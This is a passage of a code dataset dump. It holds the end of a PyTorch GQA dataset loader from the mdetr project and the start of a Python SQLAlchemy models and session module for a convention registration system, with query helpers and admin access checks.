torch.as_tensor(\n self.answer2id_by_type[\"answer_attr\"][answer] if coco_img[\"question_type\"] == \"attr\" else -100,\n dtype=torch.long,\n )\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_global\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_global\"] = torch.as_tensor(\n self.answer2id_by_type[\"answer_global\"][answer] if coco_img[\"question_type\"] == \"global\" else -100,\n dtype=torch.long,\n )\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_rel\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_rel\"] = torch.as_tensor(\n self.answer2id_by_type[\"answer_rel\"][answer] if coco_img[\"question_type\"] == \"rel\" else -100,\n dtype=torch.long,\n )\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_cat\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_cat\"] = torch.as_tensor(\n self.answer2id_by_type[\"answer_cat\"][answer] if coco_img[\"question_type\"] == \"cat\" else -100,\n dtype=torch.long,\n )\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_obj\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_obj\"] = torch.as_tensor(\n self.answer2id_by_type[\"answer_obj\"][answer] if coco_img[\"question_type\"] == \"obj\" else -100,\n dtype=torch.long,\n )\n return img, target\n\n\ndef build(image_set, args):\n img_dir = Path(args.vg_img_path)\n assert img_dir.exists(), f\"provided VG img path {img_dir} does not exist\"\n\n tokenizer = RobertaTokenizerFast.from_pretrained(args.text_encoder_type)\n\n if args.do_qa:\n assert args.gqa_split_type is not None\n\n if image_set == \"train\":\n datasets = []\n for imset in [\"train\", \"val\"]:\n ann_file = Path(args.gqa_ann_path) / f\"finetune_gqa_{imset}_{args.gqa_split_type}.json\"\n\n datasets.append(\n GQAQuestionAnswering(\n img_dir,\n ann_file,\n transforms=make_coco_transforms(image_set, cautious=True),\n return_masks=args.masks,\n return_tokens=True,\n tokenizer=tokenizer,\n ann_folder=Path(args.gqa_ann_path),\n )\n )\n\n return torch.utils.data.ConcatDataset(datasets)\n elif image_set == \"val\":\n ann_file = Path(args.gqa_ann_path) / f\"finetune_gqa_testdev_balanced.json\"\n\n return GQAQuestionAnswering(\n img_dir,\n ann_file,\n transforms=make_coco_transforms(image_set, cautious=True),\n return_masks=args.masks,\n return_tokens=True,\n tokenizer=tokenizer,\n ann_folder=Path(args.gqa_ann_path),\n )\n elif image_set in [\"test\", \"challenge\", \"testdev\", \"submission\"]:\n ann_file = Path(args.gqa_ann_path) / f\"finetune_gqa_{image_set}_{args.gqa_split_type}.json\"\n\n return GQAQuestionAnswering(\n img_dir,\n ann_file,\n transforms=make_coco_transforms(\"val\", cautious=True),\n return_masks=args.masks,\n return_tokens=True,\n tokenizer=tokenizer,\n ann_folder=Path(args.gqa_ann_path),\n )\n\n else:\n assert False, f\"Unknown image set {image_set}\"\n\n else:\n # Only used for val during the pre-training phase\n ann_file = Path(args.gqa_ann_path) / f\"final_gqa_{image_set}.json\"\n dataset = GQADetection(\n img_dir,\n ann_file,\n transforms=make_coco_transforms(image_set, cautious=True),\n return_masks=args.masks,\n return_tokens=True,\n tokenizer=tokenizer,\n )\n return dataset\n","repo_name":"ashkamath/mdetr","sub_path":"datasets/gqa.py","file_name":"gqa.py","file_ext":"py","file_size_in_byte":6237,"program_lang":"python","lang":"en","doc_type":"code","stars":901,"dataset":"github-code","pt":"3"}
+{"seq_id":"22179117816","text":"import json\nimport operator\nimport os\nimport re\nimport uuid\nfrom collections import defaultdict\nfrom datetime import date, datetime, timedelta\nfrom functools import wraps\nfrom itertools import chain\nfrom uuid import uuid4\n\nimport bcrypt\nimport cherrypy\nimport six\nimport sqlalchemy\nfrom dateutil import parser as dateparser\nfrom pockets import cached_classproperty, classproperty, listify\nfrom pockets.autolog import log\nfrom pytz import UTC\nfrom residue import check_constraint_naming_convention, declarative_base, JSON, SessionManager, UTCDateTime, UUID\nfrom sideboard.lib import on_startup, stopped\nfrom sqlalchemy import and_, func, or_, not_\nfrom sqlalchemy.dialects.postgresql.json import JSONB\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import Query, joinedload, subqueryload, aliased\nfrom sqlalchemy.orm.attributes import get_history, instance_state\nfrom sqlalchemy.schema import MetaData\nfrom sqlalchemy.types import Boolean, Integer, Float, Date, Numeric\nfrom sqlalchemy.util import immutabledict\n\nimport uber\nfrom uber.config import c, create_namespace_uuid\nfrom uber.errors import HTTPRedirect\nfrom uber.decorators import cost_property, department_id_adapter, presave_adjustment, suffix_property\nfrom uber.models.types import Choice, DefaultColumn as Column, MultiChoice\nfrom uber.utils import check_csrf, normalize_email_legacy, normalize_phone, DeptChecklistConf, report_critical_exception, \\\n valid_email, valid_password\nfrom uber.payments import ReceiptManager\n\n\ndef _make_getter(model):\n def getter(\n self, params=None, *, bools=(), checkgroups=(), allowed=(), restricted=False, ignore_csrf=False, **query):\n\n if query:\n return self.query(model).filter_by(**query).one()\n elif isinstance(params, str):\n return self.query(model).filter_by(id=params).one()\n else:\n params = params.copy()\n id = params.pop('id', 'None')\n if id == 'None':\n inst = model()\n else:\n inst = self.query(model).filter_by(id=id).one()\n\n if not ignore_csrf:\n assert not {k for k in params if k not in allowed} or cherrypy.request.method == 'POST', 'POST required'\n\n inst.apply(params, bools=bools, checkgroups=checkgroups, restricted=restricted, ignore_csrf=ignore_csrf)\n\n return inst\n return getter\n\n\n# Consistent naming conventions are necessary for alembic to be able to\n# reliably upgrade and downgrade versions. For more details, see:\n# http://alembic.zzzcomputing.com/en/latest/naming.html\nnaming_convention = {\n 'ix': 'ix_%(column_0_label)s',\n 'uq': 'uq_%(table_name)s_%(column_0_name)s',\n 'fk': 'fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s',\n 'pk': 'pk_%(table_name)s'}\n\nif not c.SQLALCHEMY_URL.startswith('sqlite'):\n naming_convention['unnamed_ck'] = check_constraint_naming_convention\n naming_convention['ck'] = 'ck_%(table_name)s_%(unnamed_ck)s',\n\nmetadata = MetaData(naming_convention=immutabledict(naming_convention))\n\n\n@declarative_base(metadata=metadata)\nclass MagModel:\n id = Column(UUID, primary_key=True, default=lambda: str(uuid4()))\n\n required = ()\n\n @cached_classproperty\n def NAMESPACE(cls):\n return create_namespace_uuid(cls.__name__)\n\n @cached_classproperty\n def _class_attr_names(cls):\n return [\n s for s in dir(cls)\n if s not in ('_class_attrs', '_class_attr_names') and\n not s.startswith('_cached_')]\n\n @cached_classproperty\n def _class_attrs(cls):\n return {s: getattr(cls, s) for s in cls._class_attr_names}\n\n def _invoke_adjustment_callbacks(self, label):\n callbacks = []\n for name, attr in self._class_attrs.items():\n if hasattr(attr, '__call__') and hasattr(attr, label):\n callbacks.append(getattr(self, name))\n callbacks.sort(key=lambda f: getattr(f, label))\n for function in callbacks:\n function()\n\n def presave_adjustments(self):\n self._invoke_adjustment_callbacks('presave_adjustment')\n\n def predelete_adjustments(self):\n self._invoke_adjustment_callbacks('predelete_adjustment')\n\n @property\n def email_to_address(self):\n \"\"\"\n The email address that our automated emails use when emailing this model.\n In some rare cases, a model should have a column named `email` but not always use that in\n automated emails -- override this instead.\n \"\"\"\n return self.email\n\n @property\n def gets_emails(self):\n \"\"\"\n In some cases, we want to apply a global filter to a model that prevents it from\n receiving scheduled emails under certain circumstances. This property allows you\n to define such a filter.\n \"\"\"\n return True\n\n @property\n def addons(self):\n \"\"\"\n This exists only to be overridden by other events; it should return a\n list of strings are the extra things which an attendee or group has\n purchased. For example, in the MAGStock codebase, we've got code which\n looks something like this::\n\n @Session.model_mixin\n class Attendee:\n purchased_food = Column(Boolean, default=False)\n\n @property\n def addons(self):\n return ['Food'] if self.purchased_food else []\n\n Our various templates use this information to display a summary to the\n user of what they have purchased, e.g. in the prereg confirmation page\n and in their confirmation emails.\n \"\"\"\n return []\n\n @cached_classproperty\n def cost_property_names(cls):\n \"\"\"Returns the names of all cost properties on this model.\"\"\"\n return [\n s for s in cls._class_attr_names\n if s not in ['cost_property_names']\n and isinstance(getattr(cls, s), cost_property)]\n\n @cached_classproperty\n def multichoice_columns(cls):\n return [c for c in cls.__table__.columns if isinstance(c.type, MultiChoice)]\n\n @property\n def default_cost(self):\n \"\"\"\n Returns the sum of all cost and credit receipt items for this model instance.\n\n Because things like discounts exist, we ensure default_cost will never\n return a negative value.\n \"\"\"\n receipt, receipt_items = ReceiptManager.create_new_receipt(self)\n \n return max(0, sum([(cost * count) for desc, cost, count in receipt_items]) / 100)\n\n @property\n def stripe_transactions(self):\n \"\"\"\n Returns all logged Stripe transactions with this model's ID.\n \"\"\"\n from uber.models.commerce import ReceiptTransaction\n return self.session.query(ReceiptTransaction).filter_by(fk_id=self.id).all()\n\n @cached_classproperty\n def unrestricted(cls):\n \"\"\"\n Returns a set of column names which are allowed to be set by non-admin\n attendees filling out one of the registration forms.\n \"\"\"\n return {col.name for col in cls.__table__.columns if not getattr(col, 'admin_only', True)}\n\n @cached_classproperty\n def all_bools(cls):\n \"\"\"Returns the set of Boolean column names for this table.\"\"\"\n return {col.name for col in cls.__table__.columns if isinstance(col.type, Boolean)}\n\n @cached_classproperty\n def all_checkgroups(cls):\n \"\"\"Returns the set of MultiChoice column names for this table.\"\"\"\n return {col.name for col in cls.__table__.columns if isinstance(col.type, MultiChoice)}\n\n @cached_classproperty\n def regform_bools(cls):\n \"\"\"Returns the set of non-admin-only Boolean columns for this table.\"\"\"\n return {colname for colname in cls.all_bools if colname in cls.unrestricted}\n\n @cached_classproperty\n def regform_checkgroups(cls):\n \"\"\"\n Returns the set of non-admin-only MultiChoice columns for this table.\n \"\"\"\n return {colname for colname in cls.all_checkgroups if colname in cls.unrestricted}\n\n @cached_classproperty\n def import_fields(cls):\n \"\"\"\n Allows event plugins to inject extra import fields for the API export.\n \"\"\"\n return []\n\n @classproperty\n def _extra_apply_attrs(cls):\n \"\"\"\n Returns a set of extra attrs used by apply(). These are settable\n attributes or properties that are not in cls.__table__columns.\n \"\"\"\n return set()\n\n @classproperty\n def _extra_apply_attrs_restricted(cls):\n \"\"\"\n Returns a set of extra attrs used by apply(restricted=True). These are\n settable attributes or properties that are not in cls.__table__columns.\n \"\"\"\n return set()\n\n def _get_relation_ids(self, relation):\n return getattr(self, '_relation_ids', {}).get(relation, (None, None))\n\n def _set_relation_ids(self, relation, ModelClass, ids):\n _relation_ids = getattr(self, '_relation_ids', {})\n _relation_ids[relation] = (ModelClass, ids)\n setattr(self, '_relation_ids', _relation_ids)\n\n @presave_adjustment\n def _convert_relation_ids_to_instances(self):\n _relation_ids = getattr(self, '_relation_ids', {})\n for relation, (ModelClass, ids) in _relation_ids.items():\n self.session.set_relation_ids(self, relation, ModelClass, ids)\n setattr(self, '_relation_ids', {})\n\n @property\n def session(self):\n \"\"\"\n Returns the session object which this model instance is attached to,\n or None if this instance is not attached to a session.\n \"\"\"\n return Session.session_factory.object_session(self)\n\n @classmethod\n def get_field(cls, name):\n \"\"\"Returns the column object with the provided name for this model.\"\"\"\n return cls.__table__.columns[name]\n\n def __eq__(self, m):\n return self.id is not None and isinstance(m, MagModel) and self.id == m.id\n\n def __ne__(self, m):\n return not (self == m)\n\n def __hash__(self):\n return hash(self.id)\n\n @property\n def is_new(self):\n \"\"\"\n Boolean property indicating whether or not this instance has already\n been saved to the database or if it's a new instance which has never\n been saved and thus has no corresponding row in its database table.\n \"\"\"\n return not instance_state(self).persistent\n\n @property\n def created(self):\n return self.get_tracking_by_instance(self, action=c.CREATED, last_only=True)\n\n @property\n def last_updated(self):\n return self.get_tracking_by_instance(self, action=c.UPDATED, last_only=True)\n\n @property\n def db_id(self):\n \"\"\"\n A common convention in our forms is to pass an \"id\" parameter of \"None\"\n for new objects and to pass the actual id for objects which already\n exist in our database, which lets the backend know whether to perform a\n save or an update. This method returns \"None\" for new objects and the\n id for existing objects, for use in such forms.\n \"\"\"\n return None if self.is_new else self.id\n\n def orig_value_of(self, name):\n \"\"\"\n Sometimes we mutate a model instance but then want to get the original\n value of a column before we changed it before we perform a save. This\n method returns the original value (i.e. the value currently in the db)\n for the column whose name is provided. If the value has not changed,\n this just returns the current value of that field.\n \"\"\"\n hist = get_history(self, name)\n return (hist.deleted or hist.unchanged or [getattr(self, name)])[0]\n\n @suffix_property\n def _ints(self, name, val):\n \"\"\"\n Given a column that uses a tuple of integers and strings, returns a\n list of integers. This allows us to use 'x in y' searching for\n MultiChoice columns.\n\n These arguments are supplied by the @suffix_property decorator based\n on the variable name preceding '_ints'.\n\n Args:\n name: The name of the column we're inspecting, e.g., \"interests\".\n val: The list of tuples the column uses as possible values,\n e.g., \"c.INTEREST_OPTS\".\n\n Returns:\n A list of integers or an empty list if val is falsey.\n\n \"\"\"\n if not val or not name:\n return []\n\n choices = dict(self.get_field(name).type.choices)\n val = self.get_field(name).type.convert_if_labels(val)\n return [int(i) for i in str(val).split(',') if i and int(i) in choices]\n\n @suffix_property\n def _label(self, name, val):\n if not val or not name:\n return ''\n\n try:\n val = int(val)\n except ValueError:\n log.debug('{} is not an int. Did we forget to migrate data for {} during a DB migration?', val, name)\n return ''\n\n if val == -1:\n return \"Unknown\"\n\n label = self.get_field(name).type.choices.get(val)\n if not label:\n log.debug('{} does not have a label for {}, check your enum generating code', name, val)\n return ''\n return label\n\n @suffix_property\n def _local(self, name, val):\n return val.astimezone(c.EVENT_TIMEZONE)\n\n @suffix_property\n def _labels(self, name, val):\n ints = getattr(self, name + '_ints')\n labels = dict(self.get_field(name).type.choices)\n return sorted(labels[i] for i in ints)\n\n def __getattr__(self, name):\n suffixed = suffix_property.check(self, name)\n if suffixed is not None:\n return suffixed\n\n choice = getattr(c, name, None)\n if choice is not None:\n if len(self.multichoice_columns) == 1:\n multi = self.multichoice_columns[0]\n if choice in multi.type.choices_dict:\n return choice in getattr(self, multi.name + '_ints')\n\n if name.startswith('is_'):\n return self.__class__.__name__.lower() == name[3:]\n \n if name.startswith('default_') and name.endswith('_cost'):\n if self.active_receipt:\n log.error('Cost property {} was called for object {}, which has an active receipt. This may cause problems.'.format(name, self))\n\n receipt_items = uber.receipt_items.cost_calculation.items\n try:\n cost_calc = receipt_items[self.__class__.__name__][name[8:]](self)\n if not cost_calc:\n return 0\n\n try:\n return sum(item[0] * item[1] for item in cost_calc[1].items()) / 100\n except AttributeError:\n if len(cost_calc) > 3:\n return cost_calc[1] * cost_calc[3] / 100\n else:\n return cost_calc[1] / 100\n except Exception:\n pass\n\n raise AttributeError(self.__class__.__name__ + '.' + name)\n\n def get_tracking_by_instance(self, instance, action, last_only=True):\n from uber.models.tracking import Tracking\n query = self.session.query(Tracking).filter_by(fk_id=instance.id, action=action).order_by(Tracking.when.desc())\n return query.first() if last_only else query.all()\n\n def coerce_column_data(self, column, value):\n if isinstance(value, six.string_types):\n value = value.strip()\n\n try:\n if value is None:\n return # Totally fine for value to be None\n\n elif value == '' and isinstance(column.type, (Float, Numeric, Choice, Integer, UTCDateTime, Date)):\n return None\n\n elif isinstance(column.type, Boolean):\n if isinstance(value, six.string_types):\n return value.strip().lower() not in ('f', 'false', 'n', 'no', '0')\n return bool(value)\n\n elif isinstance(column.type, Float):\n return float(value)\n\n elif isinstance(column.type, Numeric):\n if isinstance(value, six.string_types) and value.endswith('.0'):\n return int(value[:-2])\n else:\n return int(float(value))\n\n elif isinstance(column.type, (MultiChoice)):\n if isinstance(value, list):\n value = ','.join(map(lambda x: str(x).strip(), value))\n else:\n value = str(value).strip()\n return column.type.convert_if_labels(value)\n\n elif isinstance(column.type, Choice):\n return column.type.convert_if_label(value)\n\n elif isinstance(column.type, Integer):\n value = int(float(value))\n\n elif isinstance(column.type, UTCDateTime):\n try:\n value = datetime.strptime(value, c.TIMESTAMP_FORMAT)\n except ValueError:\n value = dateparser.parse(value)\n\n if not value.tzinfo:\n return c.EVENT_TIMEZONE.localize(value)\n else:\n return value\n\n elif isinstance(column.type, Date):\n try:\n value = datetime.strptime(value, c.DATE_FORMAT)\n except ValueError:\n value = dateparser.parse(value)\n return value.date()\n\n elif isinstance(column.type, JSONB) and isinstance(value, str):\n return json.loads(value)\n\n except Exception as error:\n log.debug(\n 'Ignoring error coercing value for column {}.{}: {}', self.__tablename__, column.name, error)\n return value\n\n def apply(self, params, *, bools=(), checkgroups=(), restricted=True, ignore_csrf=True):\n \"\"\"\n Args:\n restricted (bool): If True, restrict any changes only to fields\n which we allow attendees to set on their own. If False, allow\n changes to any fields.\n \"\"\"\n bools = self.regform_bools if restricted else bools\n checkgroups = self.regform_checkgroups if restricted else checkgroups\n for column in self.__table__.columns:\n if (not restricted or column.name in self.unrestricted) and column.name in params and column.name != 'id':\n value = params[column.name]\n setattr(self, column.name, self.coerce_column_data(column, value))\n\n for column in self.__table__.columns:\n if (not restricted or column.name in self.unrestricted) \\\n and (column.type is JSON or isinstance(column.type, JSON)):\n\n fields = getattr(self, '_{}_fields'.format(column.name), {})\n for field in fields.keys():\n if field in params:\n setattr(self, field, params[field])\n\n if cherrypy.request.method.upper() == 'POST':\n for column in self.__table__.columns:\n if column.name in bools:\n setattr(self, column.name, bool(int(params.get(column.name, 0))))\n elif column.name in checkgroups and column.name not in params:\n setattr(self, column.name, '')\n\n if not ignore_csrf:\n check_csrf(params.get('csrf_token'))\n\n _extra_apply_attrs = self._extra_apply_attrs_restricted if restricted else self._extra_apply_attrs\n\n for attr in _extra_apply_attrs:\n if attr in params:\n setattr(self, attr, params[attr])\n\n return self\n\n def timespan(self, minute_increment=1):\n def minutestr(dt):\n return '' if dt.minute == 0 else dt.strftime(':%M')\n\n timespan = timedelta(minutes=minute_increment * self.duration)\n endtime = self.start_time_local + timespan\n\n startstr = self.start_time_local.strftime('%I').lstrip('0') + minutestr(self.start_time_local)\n endstr = endtime.strftime('%I').lstrip('0') + minutestr(endtime) + endtime.strftime('%p').lower()\n\n if self.start_time_local.day == endtime.day:\n endstr += endtime.strftime(' %A')\n if self.start_time_local.hour < 12 and endtime.hour >= 12:\n return startstr + 'am - ' + endstr\n else:\n return startstr + '-' + endstr\n else:\n return startstr + self.start_time_local.strftime('pm %a - ') + endstr + endtime.strftime(' %a')\n\n\n# Make all of our model classes available from uber.models\nfrom uber.models.admin import * # noqa: F401,E402,F403\nfrom uber.models.promo_code import * # noqa: F401,E402,F403\nfrom uber.models.attendee import * # noqa: F401,E402,F403\nfrom uber.models.badge_printing import * # noqa: F401,E402,F403\nfrom uber.models.commerce import * # noqa: F401,E402,F403\nfrom uber.models.department import * # noqa: F401,E402,F403\nfrom uber.models.email import * # noqa: F401,E402,F403\nfrom uber.models.group import * # noqa: F401,E402,F403\nfrom uber.models.legal import * # noqa: F401,E402,F403\nfrom uber.models.tracking import * # noqa: F401,E402,F403\nfrom uber.models.types import * # noqa: F401,E402,F403\nfrom uber.models.api import * # noqa: F401,E402,F403\nfrom uber.models.hotel import * # noqa: F401,E402,F403\nfrom uber.models.attendee_tournaments import * # noqa: F401,E402,F403\nfrom uber.models.marketplace import * # noqa: F401,E402,F403\nfrom uber.models.mivs import * # noqa: F401,E402,F403\nfrom uber.models.mits import * # noqa: F401,E402,F403\nfrom uber.models.panels import * # noqa: F401,E402,F403\nfrom uber.models.attraction import * # noqa: F401,E402,F403\nfrom uber.models.tabletop import * # noqa: F401,E402,F403\nfrom uber.models.guests import * # noqa: F401,E402,F403\nfrom uber.models.art_show import * # noqa: F401,E402,F403\n\n# Explicitly import models used by the Session class to quiet flake8\nfrom uber.models.admin import AccessGroup, AdminAccount, WatchList # noqa: E402\nfrom uber.models.art_show import ArtShowApplication # noqa: E402\nfrom uber.models.attendee import Attendee # noqa: E402\nfrom uber.models.department import Job, Shift, Department # noqa: E402\nfrom uber.models.email import Email # noqa: E402\nfrom uber.models.group import Group # noqa: E402\nfrom uber.models.mits import MITSApplicant, MITSTeam # noqa: E402\nfrom uber.models.mivs import IndieJudge, IndieGame, IndieStudio # noqa: E402\nfrom uber.models.panels import PanelApplication, PanelApplicant # noqa: E402\nfrom uber.models.promo_code import PromoCode, PromoCodeGroup # noqa: E402\nfrom uber.models.tabletop import TabletopEntrant, TabletopTournament # noqa: E402\nfrom uber.models.tracking import Tracking # noqa: E402\n\n\nclass Session(SessionManager):\n # This looks strange, but `sqlalchemy.create_engine` will throw an error\n # if it's passed arguments that aren't supported by the given DB engine.\n # For example, SQLite doesn't support either `pool_size` or `max_overflow`,\n # so if `sqlalchemy_pool_size` or `sqlalchemy_max_overflow` are set with\n # a value of -1, they are not added to the keyword args.\n _engine_kwargs = dict((k, v) for (k, v) in [\n ('pool_size', c.SQLALCHEMY_POOL_SIZE),\n ('max_overflow', c.SQLALCHEMY_MAX_OVERFLOW),\n ('pool_pre_ping', True),\n ('pool_recycle', c.SQLALCHEMY_POOL_RECYCLE)] if v > -1)\n engine = sqlalchemy.create_engine(c.SQLALCHEMY_URL, **_engine_kwargs)\n\n @classmethod\n def initialize_db(cls, modify_tables=False, drop=False, initialize=False):\n \"\"\"\n Initialize the database and optionally create/drop tables.\n\n Initializes the database connection for use, and attempt to create any\n tables registered in our metadata which do not actually exist yet in\n the database.\n\n This calls the underlying sideboard function, HOWEVER, in order to\n actually create any tables, you must specify modify_tables=True. The\n reason is, we need to wait for all models from all plugins to insert\n their mixin data, so we wait until one spot in order to create the\n database tables.\n\n Any calls to initialize_db() that do not specify modify_tables=True or\n drop=True are ignored.\n\n i.e. anywhere in Sideboard that calls initialize_db() will be ignored.\n i.e. ubersystem is forcing all calls that don't specify\n modify_tables=True or drop=True to be ignored.\n\n Calling initialize_db with modify_tables=False and drop=True will leave\n you with an empty database.\n\n Keyword Arguments:\n modify_tables: If False, this function will not attempt to create\n any database objects (tables, columns, constraints, etc...)\n Defaults to False.\n drop: USE WITH CAUTION: If True, then we will drop any tables in\n the database. Defaults to False.\n \"\"\"\n for model in cls.all_models():\n if not hasattr(cls.SessionMixin, model.__tablename__):\n setattr(cls.SessionMixin, model.__tablename__, _make_getter(model))\n\n if drop or modify_tables or initialize:\n super(Session, cls).initialize_db(drop=drop, create=modify_tables)\n if drop:\n from uber.migration import stamp\n stamp('heads' if modify_tables else None)\n\n class QuerySubclass(Query):\n @property\n def is_single_table_query(self):\n return len(self.column_descriptions) == 1\n\n @property\n def model(self):\n assert self.is_single_table_query, \\\n 'actions such as .order() and .icontains() and .iexact() are only valid for single-table queries'\n\n return self.column_descriptions[0]['type']\n\n def order(self, attrs):\n order = []\n for attr in listify(attrs):\n col = getattr(self.model, attr.lstrip('-'))\n order.append(col.desc() if attr.startswith('-') else col)\n return self.order_by(*order)\n\n def icontains_condition(self, attr=None, val=None, **filters):\n \"\"\"\n Take column names and values, and build a condition/expression\n that is true when all named columns contain the corresponding\n values, case-insensitive.\n\n This operation is very similar to the \"contains\" method in\n SQLAlchemy, but case insensitive - i.e. it uses \"ilike\" instead\n of \"like\".\n\n Note that an \"and\" is used: all columns must match, not just one.\n More complex conditions can be built by using or_/etc on the result\n of this method.\n \"\"\"\n conditions = []\n if len(self.column_descriptions) == 1 and filters:\n for colname, val in filters.items():\n conditions.append(getattr(self.model, colname).ilike('%{}%'.format(val)))\n if attr and val:\n conditions.append(attr.ilike('%{}%'.format(val)))\n return and_(*conditions)\n\n def icontains(self, attr=None, val=None, **filters):\n \"\"\"\n Take the names of columns and values, and filters the query to\n items where each named columns contain the values,\n case-insensitive.\n\n This operation is very similar to calling\n query.filter(contains(...)), but works with a case-insensitive\n \"contains\".\n\n Note that an \"and\" is used: all columns must match, not just one.\n \"\"\"\n condition = self.icontains_condition(attr=attr, val=val, **filters)\n return self.filter(condition)\n\n def iexact(self, **filters):\n filters = [func.lower(getattr(self.model, attr)) == func.lower(val) for attr, val in filters.items()]\n return self.filter(*filters)\n\n class SessionMixin:\n def current_admin_account(self):\n if getattr(cherrypy, 'session', {}).get('account_id'):\n return self.admin_account(cherrypy.session.get('account_id'))\n\n def admin_attendee(self):\n if getattr(cherrypy, 'session', {}).get('account_id'):\n return self.admin_account(cherrypy.session.get('account_id')).attendee\n\n def current_attendee_account(self):\n if c.ATTENDEE_ACCOUNTS_ENABLED and getattr(cherrypy, 'session', {}).get('attendee_account_id'):\n try:\n return self.attendee_account(cherrypy.session.get('attendee_account_id'))\n except sqlalchemy.orm.exc.NoResultFound:\n cherrypy.session['attendee_account_id'] = ''\n \n def get_attendee_account_by_attendee(self, attendee):\n logged_in_account = self.current_attendee_account()\n if not logged_in_account:\n return\n \n attendee_accounts = attendee.managers\n if logged_in_account in attendee_accounts:\n return logged_in_account\n elif len(attendee.managers) == 1:\n return attendee.managers[0]\n\n def logged_in_volunteer(self):\n return self.attendee(cherrypy.session.get('staffer_id'))\n\n def admin_has_staffer_access(self, staffer, access=\"view\"):\n admin = self.current_admin_account()\n if admin.full_shifts_admin:\n return True\n \n dept_ids_with_inherent_role = [dept_m.department_id for dept_m in \n admin.attendee.dept_memberships_with_inherent_role]\n return set(staffer.assigned_depts_ids).intersection(dept_ids_with_inherent_role)\n\n def admin_can_see_guest_group(self, guest):\n return guest.group_type_label.upper().replace(' ','_') in self.current_admin_account().viewable_guest_group_types\n\n def admin_attendee_max_access(self, attendee, read_only=True):\n admin = self.current_admin_account()\n if not admin:\n return\n \n if admin.full_registration_admin or attendee.creator == admin.attendee or \\\n attendee == admin.attendee or attendee.is_new:\n return AccessGroup.FULL\n \n if attendee.access_sections:\n return max([admin.max_level_access(section, read_only=read_only) for section in attendee.access_sections])\n\n def admin_can_create_attendee(self, attendee):\n admin = self.current_admin_account()\n if not admin:\n return\n \n if admin.full_registration_admin:\n return True\n \n return admin.full_shifts_admin if attendee.badge_type == c.STAFF_BADGE else \\\n self.admin_attendee_max_access(attendee) >= AccessGroup.DEPT\n \n def viewable_groups(self):\n from uber.models import Attendee, DeptMembership, Group, GuestGroup\n admin = self.current_admin_account()\n \n if admin.full_registration_admin:\n return self.query(Group)\n \n subqueries = [self.query(Group).filter(Group.creator == admin.attendee)]\n \n group_id = admin.attendee.group.id if admin.attendee.group else ''\n if group_id:\n subqueries.append(self.query(Group).filter(Group.id == group_id))\n \n for key, val in c.GROUP_TYPE_OPTS:\n if val.lower() + '_admin' in admin.read_or_write_access_set:\n subqueries.append(\n self.query(Group).join(\n GuestGroup, Group.id == GuestGroup.group_id).filter(GuestGroup.group_type == key\n )\n )\n \n if 'dealer_admin' in admin.read_or_write_access_set:\n subqueries.append(\n self.query(Group).filter(Group.is_dealer)\n )\n \n return subqueries[0].union(*subqueries[1:])\n \n def access_query_matrix(self):\n \"\"\"\n There's a few different situations where we want to add certain subqueries to find attendees\n based on different site sections. This matrix returns queries keyed by site section.\n \"\"\"\n admin = self.current_admin_account()\n return_dict = {'created': self.query(Attendee).filter(\n or_(Attendee.creator == admin.attendee, Attendee.id == admin.attendee.id))}\n # Guest groups\n for group_type, badge_and_ribbon_filter in [\n (c.BAND, and_(Attendee.badge_type == c.GUEST_BADGE, Attendee.ribbon.contains(c.BAND))),\n (c.GUEST, and_(Attendee.badge_type == c.GUEST_BADGE, ~Attendee.ribbon.contains(c.BAND)))\n ]:\n return_dict[c.GROUP_TYPES[group_type].lower() + '_admin'] = (\n self.query(Attendee).join(Group, Attendee.group_id == Group.id)\n .join(GuestGroup, Group.id == GuestGroup.group_id).filter(\n or_(\n or_(\n badge_and_ribbon_filter,\n and_(\n Group.id == Attendee.group_id,\n GuestGroup.group_id == Group.id,\n GuestGroup.group_type == group_type,\n )\n )\n )\n )\n )\n \n return_dict['panels_admin'] = self.query(Attendee).outerjoin(PanelApplicant).filter(\n or_(Attendee.ribbon.contains(c.PANELIST_RIBBON),\n Attendee.panel_applications != None,\n Attendee.assigned_panelists != None,\n Attendee.panel_applicants != None,\n Attendee.panel_feedback != None))\n return_dict['dealer_admin'] = self.query(Attendee).join(Group, Attendee.group_id == Group.id).filter(Attendee.is_dealer)\n return_dict['mits_admin'] = self.query(Attendee).join(MITSApplicant).filter(Attendee.mits_applicants)\n return_dict['mivs_admin'] = (self.query(Attendee).join(Group, Attendee.group_id == Group.id)\n .join(GuestGroup, Group.id == GuestGroup.group_id).filter(\n and_(Group.id == Attendee.group_id, GuestGroup.group_id == Group.id, GuestGroup.group_type == c.MIVS)\n ))\n return_dict['art_show_admin'] = self.query(Attendee\n ).outerjoin(\n ArtShowApplication, \n or_(ArtShowApplication.attendee_id == Attendee.id,\n ArtShowApplication.agent_id == Attendee.id)\n ).outerjoin(ArtShowBidder).filter(\n or_(Attendee.art_show_bidder != None,\n Attendee.art_show_purchases != None,\n Attendee.art_show_applications != None,\n Attendee.art_agent_applications != None)\n )\n return return_dict\n \n def viewable_attendees(self):\n from uber.models import Attendee, DeptMembership, Group, GuestGroup, MITSApplicant\n admin = self.current_admin_account()\n \n if admin.full_registration_admin:\n return self.query(Attendee)\n \n subqueries = [self.access_query_matrix()['created']]\n \n for key, val in self.access_query_matrix().items():\n if key in admin.read_or_write_access_set:\n subqueries.append(val)\n \n if admin.full_shifts_admin:\n subqueries.append(\n self.query(Attendee).filter(Attendee.staffing)\n )\n \n return subqueries[0].union(*subqueries[1:])\n\n def checklist_status(self, slug, department_id):\n attendee = self.admin_attendee()\n conf = DeptChecklistConf.instances.get(slug)\n if not conf:\n raise ValueError(\n \"Can't access dept checklist INI settings for section '{}', check your INI file\".format(slug))\n\n if not department_id:\n return {'conf': conf, 'relevant': False, 'completed': None}\n\n department = self.query(Department).get(department_id)\n if department:\n return {\n 'conf': conf,\n 'relevant': attendee.can_admin_checklist_for(department),\n 'completed': department.checklist_item_for_slug(conf.slug)\n }\n else:\n return {\n 'conf': conf,\n 